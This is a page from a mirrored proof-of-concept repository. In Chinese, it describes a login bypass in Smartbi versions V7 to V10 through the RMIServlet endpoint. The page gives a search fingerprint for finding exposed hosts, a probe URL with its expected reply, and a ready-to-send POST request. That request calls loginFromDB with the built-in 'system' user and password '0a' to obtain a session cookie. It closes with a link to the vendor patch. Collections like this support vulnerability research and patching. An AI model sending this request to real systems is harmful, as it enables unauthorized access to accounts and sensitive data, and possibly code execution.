admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 19:38:09 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Smartbi RMIServlet 登陆绕过漏洞.md

48 lines
1.0 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Smartbi RMIServlet 登陆绕过漏洞
## 漏洞描述
该漏洞源于 Smartbi 默认存在内置用户,在使用特定接口时,攻击者可绕过用户身份认证机制获取内置用户身份凭证,随后可使用获取的身份凭证调用后台接口,最终可能导致敏感信息泄露和代码执行。
## 漏洞影响
```
V7 <= Smartbi <=V10
```
## 网络测绘
```
app="SMARTBI"
```
## 漏洞复现
验证漏洞是否存在
```
http://your-ip/smartbi/vision/RMIServlet
```
出现以下回显证明漏洞存在
```
{"retCode":"CLIENT_USER_NOT_LOGIN","result":"尚未登录或会话过期"}
```
poc
```
POST /smartbi/vision/RMIServlet HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
className=UserService&methodName=loginFromDB&params=["system","0a"]
```
通过获取的Cookie登陆。
## 漏洞修复
官方已发布漏洞补丁及修复版本请评估业务是否受影响后酌情升级至安全版本https://www.smartbi.com.cn/patchinfo
Reference in New Issue Copy Permalink